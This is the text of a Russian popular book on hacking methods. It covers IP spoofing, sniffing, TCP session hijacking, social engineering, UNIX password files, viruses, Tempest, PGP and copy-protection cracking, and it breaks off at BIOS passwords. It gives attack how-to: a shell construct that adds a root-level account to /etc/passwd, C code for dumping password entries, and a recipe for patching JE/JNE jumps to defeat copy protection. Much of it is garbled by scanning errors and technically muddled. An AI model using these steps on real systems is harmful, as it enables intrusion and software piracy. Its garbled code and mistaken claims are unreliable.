Максим Левин

 

Методы хакинга

 

Спуфинг

Известно, что любая система защиты типа Firewall позволяет «жить» только определенным адресам IP. Это весьма серьезное препятствие для проникновения в сеть.

Поэтому хакеры нашли метод для преодоления этого барьера — спуфинг IP.

Сначала хакер выясняет, какие из адресов IP проходят через firewall, затем использует один из вычисленных адресов в качестве своего и таким образом получает доступ к системе. Впрочем, это не всегда так. Например, известная система защиты FireWall-1 действительно дает возможность установить прозрачное подключение к Internet, используя практически весь диапазон протоколов межсетевого взаимодействия, обеспечив при этом некоторую (только в третьей версии этого экрана была залатана дырка, сидевшая в кодировке данных и идентификации клиента-пользователя) защиту сети. Многих администраторов, конечно, радует интуитивный графический интерфейс этой системы, а хакеров пугает многопротокольная проверка пакетов с так называемым учетом состояния протокола (SMLI), поэтому они стараются просто обходить сети с FireWall-1, оставив спуффинг для другой системы.

Многие системные администраторы считают, что все-таки существует возможность вызвать мастера, который поставит стальную дверь с цветным домофоном. И многие, конечно, надеются на эти самые бранд- мауэры Internet.

Позволим заметить, что это далеко не так. Да, Firewalls способны изолировать локальные сети от вскрытия из Internet посредством экранирующих маршрутизаторов, двусторонних шлюзов и барьерной хост-машины. Но! Проблема в том, что это известно каждому хакеру. Экранирующие маршрутизаторы? Прекрасно! Проверка адреса IP и закупорка фальшивого трафика? А кто говорит, что это не так? Все верно! Купорим трафик. А как насчет Telnet и useraame/password logon?! Terminal Access Controller Access System? Включайте!

Сниффинг

Сеть TCP/IP — это около 150 дырок, сквозь которые открывается доступ в систему (TCP/IP — протокол, через который устанавливается исключительно обоюдное постоянное соединение). Это так и еще раз так. И в первую очередь потому, что любой, кто регистрируется в сети TCP/IP (через telnet или ftp) посылает данные о своем Пароле в обыкновенном IP- пакете. Поэтому, чтобы получить пароль и логин, достаточно выследить подобный пакет, приходящий на известный адрес, то есть захватить трафик. Далее у хакера будет выбор. Он может получить реквизиты чайника. Тогда доступ в систему будет ограниченным. Но если он получит пароль системного администратора, то сможет скачать файл паролей всех пользователей системы.

Сниффинг — один из самых популярных методов воровства данных в сети (паролей, имен пользователей, ключей и т.д.) посредством специального программного обеспечения (так называемых снифферов). Снифферы, как правило, доступны лишь системным администраторам, так как эти системы весьма дорогие и не по карману даже самому крутому хакеру. Если сниффер попадает в руки хакера, то он сможет весьма эффективно контролировать сеть, захватив пароль и идентификационное имя системного администратора.

Атака посредством сниффинга не предусматривает создание собственного фальшивого адреса IP для обмана фильтрующей системы адресов. И в самом деле, зачем нужен фальшивый IP, если замедляется только скорость входящего в систему потока информации. Это означает, что все можно списать на плохое качество связи.

Лидер среди всех снифферских лидеров — это пакет IP-Watcher:

·        выборочное отслеживание пакетов IP.

·        захват активного соединения.

·        закупорка сетевых соединений.

·        закрепление на удаленной системе.

·        прерывание активного соединения TCP.

·        совместное использование нескольких соединений.

·        невозможность идентификации административным мониторингом.

Самый смак пакета IP-Watcher заключается в том, что хакер может продлить жизнь соединению после его разрыва пользователем. Хакер загоняет пользователя в ловушку. Сначала он захватывает трафик. Затем рвет связь. Ждет. Пользователь опять входит в систему и регистрируется. Пароль у хакера в кармане.

Выборочное отслеживание пакетов IP позволяет, например, перехватывать только идентификационные данные или файлы любого компьютера, принадлежащие серверу.

Мусорные бачки

Хакеры часто исследуют мусорные бачки крупных компаний и иногда находят счета за телефонные переговоры, внутренние телефоны компании, различные технические руководства, номера кредитных карточек и т.д.

Ловля на дурачка

Каждый хороший хакер обладает превосходными навыками в искусстве пудрить мозги. Например, хакер может заручиться доверием системного администратора с тем, чтобы получить доступ к секретной информации посредством простого телефонного разговора, в котором он представит себя в качестве какого-нибудь техника-смотрителя.

Взлом паролей

Самый простой путь — интуиция хакера (названия песен, имена актеров). Более сложный — через специальную программу, которая автоматически ищет пароль с помощью словаря.

У хакеров имеется огромное количество методов для выяснения паролей и получения доступа к сетям. Эти методы варьируются от простых (запись в отдельный log-файл нажатий клавиатуры) до изысканно сложных (дешифрование огромных баз данных).

Другие методы

Любой квалифицированный хакер через обыкновенный факс-модем может проникнуть даже в компьютер правительственного учреждения и, при желании, настолько внедриться в любую как бы то ни было защищенную систему, что просто-напросто разрушит ее. Так оно и было. Достаточно вспомнить злополучный сегмент Milnet Сети сетей и всем известную лабу Rome ВМС США. Да, это был настоящий кошмар, когда один из этих чудаков-хакеров творил безобразия в течение недели на одной из самых секретных военных баз Америки!

Вскрыть сеть можно и с помощью обыкновенного факс-модема или даже факс-аппарата. Ведь в любой достаточно крупной компании факс подключен к LAN! А это значит, что через номер факса хакер открывает доступ к заветному шлюзу.

Любой более или менее серьезный (или даже несерьезный) хакер Internet ориентируется на локальную сеть. Ему интересен софт защиты от несанкционированного доступа. Он спит новыми версиями firewall. Он смеется при упоминании дурацкого «брандмауэр». Sun! Sun! Sun! На мир Робин-Гудов надвигается шерифовский Sun! Все! Все погибли! Все хакеры стали системными администраторами! Они исправились. Они больше не будут... Да-да, системные администраторы утверждают, что именно брандмауэр и есть то самое устройство, размещенное между локальной сетью, и Internet позволяет разного рода придуркам отстать от нашего сервера. Вот именно, что только придуркам. Настоящим придуркам! Лицезреете пакетики для остановки шпионского трафика?

А хакер давно завладел всеми функциями подтверждения полномочий! На самом деле хакер может сам проверить входные и выходные данные.

Многие сисады боятся прощупывания их хакерами. И многие знают, что закупорка пакетов UDP может остановить вскрытие. Почему? Потому что сработает защита! Да, хакер блокирует пакеты, а поэтому любые входы через TCP так же блокируются. Но проблема в том, что в разработке самых умных брандмауэров участвуют те самые хакеры!

А почему бы и нет? Почему бы и не написать код вирусной программы, а потом придумать соответствующий антивирус!

Многие компании защищаются электронными карточками. Поэтому их вскрывают меньше других. Это дело действительно грамотно сконфигурировано. SecurlD Card имеет только тот юзер, который имеет право доступа! Соответствующая прикладнуха идентифицирует истинность юзера через двойную проверку счета и персональный код. Это все, действительно, хорошо за исключением тех случаев, когда простой народ подает в суд. Не проще ли, господа, просто повесить трубку? Пусть всегда будет занято? Или нет?

А многие, ради эксперимента, допускают к своим сетям хакеров. Результат бывает плачевным. Хакеры проникают в массу секретных систем, получают полный контроль и делают так, что их никто не может обнаружить в течение долгого времени.

Хакеры пользуются ошибками софта. Они знают, что система заработает сама по себе и конфиденциальная информация будет качаться туда, куда ей необходимо качаться.

Бывают, конечно, и «случайные ошибки». А почему бы и нет? Могут быть в софте такие ошибки. Преднамеренные... Программные закладки, программные закладки... Хакеры используют их для тех или иных операций на удаленной машине. Да, действительно, хакеры используют эти самые закладки в своих межсетевых махинациях! И если ваша система есть узел коммутации телекоммуникационной сети, то хакеры могут расчленить сеть и воспользоваться расчлененным файлом паролей.

Именно таким образом на Венеру не полетел космический корабль! Почему? Да потому, что оператор вместо запятой поставил точку. А как насчет 100 000 долларов, которые были позаимствованы неким анонимным подлецом во Внешэкономбанке нерушимой республики свободной? Хакеры, действительно, могут свести на нет безопасность информации любого сервера! Кто же они такие? Хорошие программисты? Бывшие системные администраторы? Обыкновенные студенты? Нигилисты? Оскорбленные юзеры? Вундеркинды из компьютерной школы?

Взлом сети

Возможен, например, с помощью Internet. Достаточно похитить пароль через удаленный доступ по протоколам FTP или Telnet. В этом случае у хакера имеется возможность перехватить трафик и с помощью какой-нибудь ищейки поймать идентификаторы пользователей, а если повезет, то и тонны паролей того или иного узла. Задача хакера — получить пароль высокого уровня, то есть пароль супервизора, и уже с помощью этой информации захватить пароли всех остальных юзеров узла.

Хакер может войти в сеть в качестве удаленного пользователя под видом проверки электронного почтового ящика. Как правило, пароли для электронной почты весьма простые, и иногда поддаются расшифровке с первой попытки.

Угоняем TCP

Хакеры-профи применяют более действенные методы взлома. Речь идет об угоне соединения TCP. Схема проста. Как только реальный юзер идентифицируется узлом, хакер переключает соединение на себя и передает в циклическом режиме по TCP ряд цифр до тех пор, пока не получает последовательность номеров, через которую можно подойти к середине сеанса связи, а затем отконнектить юзера. То есть, хакер не тратит зря время на ломку весьма сложной системы шифрования или раскодировку сеанса регистрации. Нет! Хакер угоняет весь сеанс регистрации.

Ламмеры, которые настроили софт

Хакер может также воспользоваться ошибками программного обеспечения выбранного узла. Ошибки кодов софта, обслуживающего удаленных юзеров — это беззащитные дырки. Например, знаменитый Netscape Navigator без конфигурирования защитных параметров или пиратская программа для чтения электронных сообщений, или сценарии (о них читайте ниже) CGI со свободным входом.

Другой пример. Возьмем знаменитую Microsoft и ее детище Windows. Многие применяют стек TCP/UP этой системы. Каждому же хакеру известно, что динамическая библиотека данных, отвечающая за этот стек, написана, мягко говоря, некорректно, то есть, при большом желании хакер может по любому из протоколов семейства TCP/IP получить доступ к содержимому винчестера выбранного хоста.

Действия системного администратора на хакерские прибамбасы

·               уничтожение подозрительных экаунтов.

·               мониторинг системы.

·               чтение чужой электронной корреспонденции,

·               отключение ARP.

·               построение сети без NFS.

·               использование машины без NetBIOS над TCP/IP.

Демоны команд

Если вы хотите установить связь с удаленным компьютером и запустить на нем демона команды finger, то попробуйте вставить вместо name символ кваквы, а после кваквы указать имя удаленного компьютера или его IP-адрес (имеется ввиду Telnet). Хакер через эту же квакву может запустить демона какой-нибудь другой команды. Речь всего-навсего идет о синтаксисе некоторых команд.

Телнетимся и еще раз телнетимся

Многие знают, что telnet используется для:

·               регистрации на удаленном компьютере.

·               использования софта Internet, в том числе клиентских

·               программ на удаленном компьютере.

·               запуска любого доступного софта на удаленном компьютере.

Хакер обращает внимание на последний из вышеперечисленных фактов и на нижеследующие телнетовские сайты:

·               anarchy-online.com

·               ntiabbs.ntia.doc.gov

·               10pht.com

·               sfpg.gcomm.com

·               telnet lust.isca.uiowa.edu порт 2600

·                pcspm2.dar.csiro.au

·                prince.carleton.ca порт 31337

Любимые хакерами команды UNIX

Ниже мы приводим краткое описание команд UNIX, без которых этой операционной системой никто бы не пользовался.

at

Вы указываете день/час когда выполнится команда.

batch

Выполнение команд в процессе загрузки.

chmod

Этой командой вы можете изменить полномочия файлового доступа.

chown

Был у файла один хозяин, а стал другой.

cron

Это демон таймера, точнее демон команд batch и at.

crontab

Вы можете указать промежутки времени, в течение которых будут выполнены какие-либо команды.

ftp

Работаем с удаленным компьютером. Принимаем или пересылаем файлы.

kill

Послать некоторому процессу сигнал о конце работы.

logname

Хочу получить регистрационное имя.

mail

Прием или пересылка электронных сообщений.

news

Отобразить статью из конференции Usenet.

nslookup

Получить сведения об IP-адресе домена.

passwd

Создать/изменить пароль.

PS

Просмотреть, какие процессы в текущий момент времени активизированы.

pwcheck

Этой командой вы можете проверить файл паролей. По умолчанию этот файл лежит в каталоге /etc/passwd.

rm

Стереть файл или каталог.

sleep

Не выполнять команду в конкретный промежуток времени.

SU

Умело используя эту команду, хакер может стать привилегированным пользователем.

telnet

Доступ к удаленному компьютеру.

umask

Если вы только создаете файл, то этой командой вы можете задать так называемую маску полномочий этого файла.

uucp

Копируем файлы из одного компьютера UNIX в другой.

uuname

Отобразить список хостов UUCP.

UUX

Выполнение команд UNIX на удаленном компьютере.

who

Отобразить список текущих пользователей.

whois

Получить информацию о текущем пользователе.

write

Переслать записку текущему пользователю.

Кого взламывают в UNIX

В мире хакеров и киберпанков существует небольшая градация юзеров UNIX.

·               Technical Thug. Обычно системный программист, пишущий скрипты на sed, С, awk, perl и APL.

·               Administrative Fascist. Законченный тунеядец, вынужденный стать системным администратором UNIX.

·               Maniac. Взломщик с большим опытом. Правда, его талант в области компьютерного шпионажа не оплачивается ни Мосадом ни Кубой.

·                Idiot. Обычно кретин или старый программист на Коболе, выбранный системным администратором Международным Комитетом кретинов.

Лазейка, возникающая при передаче файлов через rср

Если параметр гср утвержден в файле config.tel, то это просто означает, что открыт доступ в систему из Internet.

Новый экаунт

Чтобы создать новый экаунт, хакер использует следующую конструкцию:

# cd /home;

mkdir "Bob's home directory"* echo "Bob Leontyef:

gandalf:0:0: :/dev/tty:compress -p > /etc/passwd

Он может также написать сценарий на Perl, который создает исходный каталог и скопирует данные в /etc/passwd, /etc/shadow и /etc/group.

Файл паролей

Доступ к файлу паролей может быть даже у простого пользователя. В стандартном UNIX файл паролей находится в каталоге /etc/passwd. В других системах этот файл может находиться в другом месте. Кроме того, файл паролей может быть скрытым.

Пароли в этом файле зашифрованы. Расшифровкой или извлечением занимаются специальные программы. Именно они и предоставляют в руки хакера самый главный пароль — суперюзера root.

В файле паролей содержатся семь идущих по порядку вещей:

·               Username

·               Encrypted password

·               User number

·               Group Number

·               GECOS Information

·               Home directory

·               Shell

Например, файл паролей из /etc/passwd может быть представлен в следующем виде:

bob:5fg63fhD3d5gh:9406:12:Bob Leontyef:/home/fsg/will:/bin/bash

Эта запись переводится так:

·               Имя пользователя: bob

·               Расшифровка пароля: 5fg63fhD3d5gh

·               Номер пользователя: 9406

·               Номер группы: 12

·               Информация GECOS: Bob Leontyef

·               Каталог по умолчанию: /home/fsg/will

·               Shell: /bin/bash

Unix-пароли расшифровываются только одним способом. Специальная программа расшифровывает текст, который вводится в поле password и сравнивает этот текст с формой дешифровки. Поэтому софт, крякающий пароли, использует коллекцию различных слов или словари. Каждое слово в таком словаре расшифровывается  и сравнивается с формой encrypted поступающего пароля.

Лучшая крякалка паролей для UnixCrack by Alec Muffett, для DOS

CrackerJack.

В UNIX широко применяется система скрытых паролей: область /etc/passwd заменяется специальным символом, а метод расшифровки хранится в отдельном каталоге, который доступен только пользователю root.

Атака на многие скрытые пароли осуществляется через специально написанную программу, которая использует последовательные запросы к getpwent, например:

«include <pwd.h>,

main()

{

struct passwd *p;

while(p=getpwent())

printf("%s:%s:%d:%d:%s:%s:%s\n",   p->pw_name,   p->pw_passwd,

p->pw_uid,   p->pw_gid,   p->pw_gecos,   p->pw_dir,   p->pw_shell);

Маленький исходник для скрытого файла паролей

«include <pwd.h>

main ()

{

struct passwd *p;

while(p=getpwent ())

printf("%s:%s:%d:%d:%s:%s:%s\n",   p->pw_name,   p->pw_passwd,

p->pw_uid,   p->pw_gid,   p->pw_gecos,   p->pw_dir,   p->pw_shell);

Конфигурация Linux и подключение к удаленному узлу

Скрипт удаленного подключения лежит в /usr/local/sbin/initppp. Далее идут конструкции:

#!/bin/sh

РРРО = "/usr/sbin/pppd"

$(PPPD) connect  '/usr/sbin/chat  -v "" ATZHOQOM1  OK ATDT3560100 \

CONNECT "" ogin:   Suserid word:   "'cat /etc/ppp/password""   \

/dev/modem 115200

Файл в /usr/sbin/pppd является стандартным, таким как /dev/modem. Например, /dev/cual. Установка опций для модема проходит через команду In -sf /dev/cual (для первого коммуникационного порта).

Файл паролей лежит в /etc/ppp/password. Через скрипт хакер может изменить пароль так:

cat/etc/ppp/passwo rd

Network Information System или древние желтые страницы UNIX

UNIX NIS позволяет нескольким компьютерам сети иметь различный уровень доступа к конфигурационным файлами. Если атакуемая версия UNIX использует NIS, то хакер получит файл паролей /etc/passwd с очень короткой строкой, типа вот этой:

+::0;0:::

Чтобы увидеть действительный файл паролей хакер использует команду ypcat passwd.

Таинственный знак после запятой

Этот знак соответствует времени хранения пароля. Это означает, что пароль в определенный момент времени может быть заменен пользователем после системного администратора. Пароль перед заменой может еще храниться некоторое время. Типичная запись /etc/passwd с данными о времени хранения пароля:

bob:5fg63fhD3d,M.z8:9406:12:Bob Leontyef:/home/fsg/will:/bin/bash

Обратите внимание на запятую в области дешифровки пароля. Знак после запятой используется только механизмом хранения пароля.

Таким образом, символы, соответствующие данным времени хранения пароля для вышеприведенного примера, будут такими:

M.z8

Эти четыре символа интерпретируются следующим образом:

·               Максимальное число недель, в течение которых пароль не может быть изменен.

·               Минимальное число недель, в течение которых пароль должен использоваться перед заменой.

Отметим три важные вещи. Если первые и вторые символы установлены как «..», то пользователь будет вынужден изменить свой пароль в следующий раз. В этом случае программа passwd удалит данные о хранении пароля.

Если третий и четвертый символы установлены как «..», то пользователь будет вынужден изменить свой пароль в следующий раз. Данные о времени хранения пароля будут соответствовать первым и вторым символам.

Если же первый символ (МАХ) меньше чем второй символ (MIN), то пользователю вообще не позволяют изменить пароль (только root может его изменить).

Заметим, что хакер не может командой su изменить данные о времени хранения пароля.

Доступ к файлу паролей системы VMS

В VMS файл паролей есть

SYS$SYSTEM:   SYSUAF.DAT

Однако, в отличие от пользователей UNIX, большинство пользователей VMS не имеет доступа даже к чтению этого файла. Хакер может взломать пароль VMS только через специальную программу, которая использует функции SYS$GETUAF для сравнения результирующих расшифрованных слов с расшифрованными словами, полученными из данных SYSUAF.DAT. Две такие программы следующие: CHECK_PASSWORD и GUESS_PASSWORD.

Windows и модем на COM4

При правильной установке джамперов, система способна произвести правильную конфигурацию вашего модема посредством технологии автоматического распознавания устройств. Но иногда случается так, что СОМ-портов не хватает, а вам необходимо установить модем. Тогда остается только одно — подключить это устройство на третий или четвертый СОМ-порт. Тут-то вам и нужно учесть одинаковые прерывания IRQ. Например, прерывание четвертого СОМ-порта может быть занято вашим видеоадаптером, а первый СОМ-порт всегда имеет в отношении прерываний больший приоритет по сравнению с четвертым СОМ-портом.

Если система вообще не видит четвертый СОМ-порт, проверьте еще раз все джампера и просто заставьте Windows 98 обновить аппаратную базу данных.

Защита системы в Windows

Концепция безопасности компьютера подразумевает защиту всех его компонентов — аппаратные средства и приложения — от несанкционированного доступа из локальной сети или Internet. В Windows любой пользователь вашего компьютера может зарегистрироваться в системе При этом имя пользователя и пароль могут быть такими же, как и при входе в сеть.

Концепция безопасности в Windows весьма примитивна. В этой системе вы, как администратор, не можете создать группу пользователей, завести учетную запись пользователя, изменить права пользователя. Вместо весьма продвинутого Диспетчера пользователей эта система предлагает довольно простенькое диалоговое окно свойств Пароли.

Все это, конечно же, означает, что Windows вообще не обеспечивает никакого уровня безопасности. Вы, как владелец собственного компьютера, не можете управлять собственными ресурсам, заводить журнал событий, ограничивать доступ к тому или иному ресурсу. Вы ничего не можете! Идентификатор пользователя ID? Нет! Эти вещи можно делать только в Windows NT. SID! SID! SID! SID! SID! SID! SID! Забыть и все тут! Никаких кодов безопасности! Доступ только в NT!

Не вы, а сама система может создать нечто, напоминающее уникальную запись, которая идентифицирует того или иного пользователя вашего компьютера.

Никакого контроля, учета и отслеживания.

Вы, конечно, администратор! Но концепция безопасности Windows не подразумевает тот факт, что вы имеете законное право распоряжаться ресурсами собственного компьютера.

Речь идет о том, что механизм безопасности в Windows реализован только на уровне регистрации пользователя.

Вам предлагается так называемая унифицированная регистрация. Это означает, что однажды введенный эккаунт (пароль и имя пользователя) в окне регистрации при загрузке системы используется для доступа ко всем службам, приложениям и аппаратным ресурсам вашего компьютера. Хорошо подобранный пароль, в принципе, способен защитить вашу систему от проникновения в нее нежданных гостей. Поэтому:

·               никогда не записывайте свой пароль на бумаге.

·               не пользуйтесь очевидными паролями (имена, названия городов).

·               никогда не отправляйте свой пароль по электронной почте.

·               используйте разумное количество символов при составлении пароля, иначе вы забудете его в один прекрасный момент и не сможете изменить никогда.

С помощью вкладки Смена паролей диалогового окна свойств Пароли, к которому вы можете обратиться из Панели управления посредством двойного щелчка клавишей мыши на значке Пароли, изменяются параметры унифицированной регистрации всех ресурсов вашего компьютера посредством задания нового пароля пользователя.

Задать новый пароль можно через вкладку Настройка пользователя, обратиться к которой вы можете посредством двойного щелчка клавишей мыши на пиктограмме Пользователи, находящейся в Панели управления.

 

 

Если вы хотите установить защиту на тот или иной ресурс вашего компьютера, например, разделить доступ к файлам и принтерам, прежде всего, сделайте так, чтобы этот ресурс стал разделяемым.

Windows позволяет управлять ресурсами вашего компьютера пользователям, которые имеют удаленный доступ к вашей системе. Для этого вы должны добавить соответствующую службу с помощью вкладки Сеть, обратиться к которой вы можете из Панели управления. Только после этого в диалоговом окне свойств Пароли появится новая вкладка Удаленное управление.

Вирусы и другие логические бомбы

Троянцы

Это было очень давно. Древние греки скрывались в чреве Троянского коня, пока не попали в город, который они решили завоевать. Там они покинули убежище и совершили массу кровавых Деяний...

Компьютерная программа «троянский конь» работает по этому же принципу. Эта программа запускает несанкционированную функцию, скрытую внутри какой-либо зарегистрированной программы. При этом последняя начинает выполнять что-то злонамеренное (хотя и не обязательно!), непредусмотренное ее автором. Если нечто подобное происходит без участия злой воли, то это называется «ошибкой» или иногда «случайностью».

Ряд антивирусных программ может обнаружить какое-то число «троянских коней», другие в этом смысле вообще бессильны. Но в любом случае эти пакеты не смогут выявить весь «табун».

Вирус

Вирус — это независимая самовоспроизводящаяся программа. Она может присоединяться к другим программам, может создавать копии самой себя. Внедрившись в оперативную память компьютера или в его дисковое пространство, вирус может повредить или совершенно разрушить данные, изменить их, или уменьшить эффективность вашей системы. Некоторые вирусы обнаруживаются антивирусными программами, но ни одна из них не дает 100% уверенности в том, что лечатся все вирусы. И что бы ни говорилось в рекламе, ни один антивирусный пакет на деле не защищает от всех вирусов, известных и неизвестных, сейчас и всегда.

Червяк

Прославленные Робертом Моррисом-младшим «черви» — это программы, которые воспроизводятся путем многократного самокопирования, от системы к системе, используя ресурсы и временами вызывая замедление работы компьютера. Они замкнуты и используют для распространения сети так же, как вирусы используют файлы. Иногда говорят, что лучшая защита от вирусов и «червей» — это вообще не переписывать новые программы и не посещать сети. Возможно, они правы. Мы бы еще добавили: «И вообще не работать на компьютере!»

Логическая бомба

Это код, вызывающий специфическую форму разрушения данных. Бомба активизируется только в случае выполнения какого-то условия. Например, логическая бомба может удалить все файлы, созданные или измененные 5 декабря. В отличие от вируса, логическая бомба не делает с себя копии.

Как защититься от вирусов

Самые простые вирусы инфицируют сектора начальной загрузки. Чтобы оградить себя от этой категории паразитов пропишите защиту на все диски, в отношении которых вы не нуждаетесь в доступе «для записи». Определенно необходимо хранить набор защищенных от записи дискет, так как, если вы все-таки заполучите вирус, эти дискеты значительно, облегчат вам жизнь.

Все входящие файлы необходимо прогонять через мощную антивирусную программу.

В числе лучших пакетов упомянем F-Prot, Dr. Solomon's Antivirus Toolkit и Thunderbyte Anti-Virus. AVP тоже неплох. Хорошие результаты дает одновременное использование нескольких пакетов. В этом случае вы сможете выловить пару вирусов, пропущенные через другой антивирус.

На сегодняшний день новые вирусы возникают со скоростью около 8 штук в день. Никакой антивирусный пакет не сможет за этим угнаться, но упомянутые выше четыре программы дадут вам наибольшую гарантию от заражения. Любой мощный пакет, обнаружит большинство простых вирусов. В то же время ни одна из существующих программ не обнаруживает все вирусы.

Сейчас известно приблизительно 5600 вирусов. Постоянно создаются новые. Если вы используете какой-то антивирусный пакет, то постарайтесь обновлять его как можно чаще (по мере выхода в свет новых версий). Если вы полагаетесь на разного рода блокираторы, то необходимо учитывать, что такие программы легко обходятся (с применением методики, известной как прокладка туннелей).

Кроме антивирусных программ вы можете использовать программы проверки целостности данных. Но обратите внимание на то, что, обеспечивая дополнительную защиту, они не очень надежны.

Можете использовать и такой специфический тип антивирусной защиты, как резидентные антивирусные пакеты. Они находятся резидентно в памяти компьютера и постоянно контролируют выполнение других программ (и иногда даже доступ к содержащимся в программе файлам). Если вы попробуете запустить какое-нибудь приложение, резидентный антивирус получит управление и протестирует эту программу на наличие известных вирусов. И только, если никаких вирусов не обнаружится, программа будет запущена.

Большинство антивирусных пакетов не защитит вас от многих видов «троянских коней», любых логических бомб и «червей». Теоретически, они способны предохранить систему от бомбы и/или «червя», однако это редко соответствует действительности.

Самый лучший, фактически единственный способ защиты состоит в том, чтобы точно знать, что записано в компьютере, и быть постоянно уверенным, что кроме вас никто ничего не добавляет. Постоянно создавайте резервные копии всех важных файлов. Системные файлы DOS должны быть защищены от записи. Поставьте защиту от записи на все диски, на которые вы сами не планируете ничего устанавливать.

. Если вы все же получили вирус, не впадайте в панику. Если не уверены в правильности своих действий,- свяжитесь с отделом поддержки компании, которая обеспечивает вас антивирусными программами. Если в этой компании нет хорошего отдела технической поддержки, найдите другую.

Самый лучший способ быть уверенным, что вирусы не распространяются — не распространять их. Некоторые делают это преднамеренно. Мы против этого. Вирусы — не игрушки.

Где можно получить подробную информацию о вирусах

Большинство книг по программированию освещает связанные с вирусами вопросы крайне скудно и односторонне. Все самое интересное остается вне их страниц. Свободный стиль изложения, освещение «около-компьютерного» законодательства и всякие остроумные ноу-хау гораздо интереснее, нежели «найдите это, потом найдите то». Информацию о технических аспектах вирусов, а также о том, что делать, если вирус уже внедрился в систему, вы можете также через Internet. На alt.virus публикуются статьи Usenet, но уровень представляемой технической информации довольно низок, и поэтому данный сервер не подходит тем, кто желает быстро избавиться от засевшего в машине вируса.

И несколько слов об экспертах по вирусам. Их много. Чтобы стать одним из них, достаточно просто сказать: «Я — эксперт по вирусам». Это, конечно, несерьезно. Понимание вирусов включает в себя знания в области программирования, операционных систем и их взаимодействия. Для того чтобы свободно ориентироваться в том, что называется «Cult of Virus», требуется определенная проницательность.

Существует несколько неплохих публикаций, посвященных вирусам и «Cult of Virus». В этой связи упомянем FTP-сайт ftp.informatik.unihamburg.de, на котором размещены довольно хорошие программы и тексты.

Tempest

Tempest это сокращение от Transient Electromagnetic Pulse Surveillance Technology.

Компьютеры и другое электронное оборудование реагируют на вмешательство в окружающую их среду. Это можно наблюдать, поместив два видеомонитора близко друг к другу. Изображения будут вести себя очень странно до тех пор, пока вы не разъедините мониторы.

Особенно важным моментом для наблюдателя является эмиссия цифровых импульса (1 и 0) и то, как она используются в компьютерах.

Данные с монитора можно получить двумя способами: можно направить приемник на монитор, и ловить изображение, а также можно просто ловить излучение с проводов, идущих к монитору. Хотя большую часть времени упомянутые эмиссии — просто мелкие раздражители, они могут иногда быть весьма полезны. Предположим, что мы хотим узнать, какой компьютер все еще продолжает работать. Мы можем разместиться в фургоне под окнами офиса и, используя высокочувствительное электронное оборудование, попытаться подобрать и декодировать излучаемые работающим видеомонитором эмиссии. Последние обычно располагаются в пределах 55-245 Mhz и могут быть приняты на расстоянии до километра.

Контролирующий прибор может точно определить различные источники излучения, потому что последние состоят из множества различных элементов, и это, вместе с рядом других факторов, влияет на частоту испускаемого излучения. Например, различные электронные компоненты в VDU, различные технологии, задействованные в создании VDU, различные синхронизаторы строк и т.д. Синхронизируя свой растр с растром адресатов, мы может нарисовать в реальном времени картинку, расположенную на наблюдаемом экране.

Эту технологию может приобрести любой, не только правительственные службы. Адресат может экранировать испускаемые его оборудованием эмиссии или использовать оборудование, которое не генерирует сильные эмиссии. Однако использование Tempest простыми гражданами в Соединенных Штатах признано незаконным.

Tempest — это правительственная программа США, применяемая для оценки электронного оборудования и подтверждения статуса безопасности его от прослушивания. Полученная с помощью Tempest сертификация прошедшего тестирование оборудования означает, что параметры испускаемого излучения соответствуют стандартам, определенным в секретном правительственном документе NACSIM 5100A (Classified). В этом документе определяются также уровни излучения этого оборудования для правительства США и соответствие этих уровней информации, которую допускается выводить на эти приборы.

Cryptoxxxxxxx

Сообщение может быть передано открытым текстом или в кодированном виде. Процесс маскировки сообщения с целью сокрытия его сущности, называется шифрованием. Зашифрованное сообщение называется ciphertext (зашифрованный текст). Процесс конвертации зашифрованного текста обратно в открытый текст называется расшифровкой.

Искусство и наука обеспечения безопасности и сохранности сообщений называется криптографией (cryptography) и осуществляется специалистами-криптографами (cryptographers). Криптоаналисты (cryptana-lysts) — это практики криптоанализа (cryptanalysis), искусства и науки чтения зашифрованных текстов. Отрасль математики, включающая в себя криптография и криптоанализ, называется криптологией (cryptology); специалисты-практики в этой области именуются криптологами (cryptol-ogists).

PGP

PGP использует шифрование с общим ключом для защиты E-mail и содержащих данные файлов. Эта программа предназначена для установления надежной связи с людьми, которых вы никогда не видели, при отсутствии безопасных каналов связи, необходимых для предшествующего обмена ключами. PGP быстра в работе, прекрасно оформлена, снабжена цифровыми подписями, предоставляет возможность сжатия данных, и обладает эргономичным интерфейсом.

Pretty Good Privacy (PGP), разработанная компанией Phil's Pretty Good Software — это работающее под MS-DOS, Unix, VAX/VMS и рядом других операционных систем криптографическое программное обеспечение, обеспечивающее высокую степень защиты.

PGP позволяет секретно, безопасно и удобно обмениваться файлами или сообщениями. «Секретно» — значит, никто, кроме адресата, не сможет прочитать письмо. «Безопасно» подразумевает, что сообщение исходит именно от того корреспондента, который обозначен как автор-отправитель. А удобство обусловлено тем, что и секретность, и безопасность обеспечиваются без использования «горячих клавиши для вызова криптографических функций. При использовании PGP пользователям для обмена ключами не нужны специальные каналы безопасности, что делает программу гораздо более простой в использовании. Причина этого в том, что PGP основана на мощной современной технологии, называемой «public key» cryptography (шифрование с использованием «публичного» ключа).

PGP объединяет в себе удобство «public key (публичного ключа)» криптосистемы Rivest-Shamir-Adlerrian (RSA) с быстродействием стандартного криптографического софта, сжатие данных перед шифрованием, симпатичный эргономичный дизайн, и сложное кодирование ключа.

Кроме того, PGP выполняет функции public-key быстрее, чем большинство других программ. PGP — это массовый криптографический продукт.

Как обойти защиту от копирования

Есть два общих метода обхода защиты от копирования. Первый состоит в использовании программы, которая удаляет защиту от копирования. Наиболее известные программы этого рода — CopyllPC (разработчик Central Point Software) и CopyWrite (разработчик Quaid Software). Второй метод подразумевает внесение исправлений в программу защиты. Ряд популярных программ позволяет размещать уже готовые исправления. Для того, чтобы исправить код программы, используйте любой hex-редактор (редактор шестнадцатеричных кодов), например, debug или нортоновский DiskEdit. Если это недоступно, установите patch самостоятельно.

Создание patch требует отладчика, типа Soft-Ice или Sourcer. Вам также понадобится знание языка ассемблера (язык команд процессора). Загрузитесь защитную программу под отладчиком и просмотрите ее на предмет обнаружения защитного механизма. Когда последний будет обнаружен, измените код программы. Код может быть изменен из JE (Jump on Equal) или JNE (Jump On Not Equal) на JMP (Jump Unconditionally). Или же можно просто заменить на команду NOP (No Operation).

Как взломать пароль BlOS'a

Это зависит того, какой BIOS установлен на компьютере. Общий BIOS включает в себя AMI, Award, IBM и Phoenix. Существуют много других BIOS'OB, но эти наиболее распространены.

Некоторые BlOS'ы позволяет установить пароль, запрашиваемый при загрузке системы. Другие — пароль, запрашиваемый при входе в setup BlOS'a.

